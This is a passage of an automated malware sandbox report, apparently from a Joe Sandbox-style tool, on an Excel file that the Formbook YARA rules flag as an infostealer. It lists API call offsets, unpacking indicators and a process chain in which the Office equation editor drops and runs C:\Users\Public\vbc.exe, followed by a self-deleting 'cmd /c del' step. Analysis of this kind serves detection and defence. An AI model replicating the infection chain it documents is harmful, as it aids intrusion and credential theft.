          Source: C:\Users\Public\vbc.exeCode function: 5_2_0097010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00971148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00971930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096F938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096FAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096FA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096FB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096FC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00970C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096FC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00971D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_020600C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_020607AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02060048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02060060 NtQuerySection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02060078 NtResumeThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_020610D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0206010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02061148 NtOpenThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_020601D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02061930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02060C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02061D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_000981D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00098280 NtReadFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00098300 NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_000983B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0009827B NtCreateFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_000982FD NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_000983AB NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00404853
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00406131
          Source: C:\Users\Public\vbc.exeCode function: 4_2_73001A98
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C87B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00401174
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BA9A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C6B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C70
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CC9C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C548
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BDD4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D87
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C7AF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0097E0C6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009AD005
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0099905A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00983040
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0097E2E9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A21238
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A263BF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009A63DB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0097F3CF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00982305
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00987353
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009CA37B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00991489
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009B5485
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009BD47D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0099C5F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0098351F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009C6540
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00984680
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0098E6C1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A22622
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009CA634
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0098C7BC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A0579A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009B57C3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A1F8EE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0098C85C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009A286D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009829B2
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A2098E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009969FE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A05955
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A33A83
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A2CBA4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0097FBD7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A0DBDA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009A7B00
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A1FDDD
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009B0D3B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0098CD5B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02111238
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0206E2E9
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02072305
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02077353
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_020BA37B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0206F3CF
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_020963DB
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0209D005
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02073040
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0208905A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0206E0C6
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02112622
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02074680
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0207E6C1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_020F579A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0207C7BC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_020A57C3
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_020AD47D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02081489
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_020A5485
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0207351F
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_020B6540
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0208C5F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02123A83
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02097B00
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0211CBA4
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0206FBD7
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_020FDBDA
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0207C85C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0209286D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0210F8EE
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_020F5955
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0211098E
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_020729B2
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_020869FE
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_020A2E2F
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0208EE4C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02080F3F
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0209DF7C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_020A0D3B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0207CD5B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0210FDDD
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0009C548
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0009C7AF
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0009C87B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00088C6B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00088C70
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0009CC9C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00082D87
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00082D90
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00082FB0
          Source: L2.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0206DF5C appears 115 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 020DF970 appears 81 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 020B3F92 appears 108 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 020B373B appears 238 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0206E2A8 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0097DF5C appears 105 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0097E2A8 appears 37 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 009EF970 appears 78 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 009C3F92 appears 111 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 009C373B appears 210 times
          Source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.510000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.510000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.510000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.510000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: explorer.exe, 00000006.00000000.2157630203.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/21@8/4
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00402020 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$L2.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD558.tmpJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\control.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\control.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: L2.xlsxVirustotal: Detection: 30%
          Source: L2.xlsxReversingLabs: Detection: 26%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: L2.xlsxStatic file information: File size 1308600 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: control.pdb source: vbc.exe, 00000005.00000002.2187506391.0000000000880000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, control.exe
          Source: L2.xlsxInitial sample: OLE indicators vbamacros = False
          Source: L2.xlsxInitial sample: OLE indicators encrypted = True

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\Public\vbc.exeUnpacked PE file: 5.2.vbc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_73002F60 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C9AD push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0040D291 push ebp; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3C5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0040C394 pushad ; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B47C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B412 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B41B push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00414E45 push ebp; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004106D4 push cs; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00414F4F push ss; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0206DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0008D291 push ebp; iretd
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0008C394 pushad ; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0009B3C5 push eax; ret
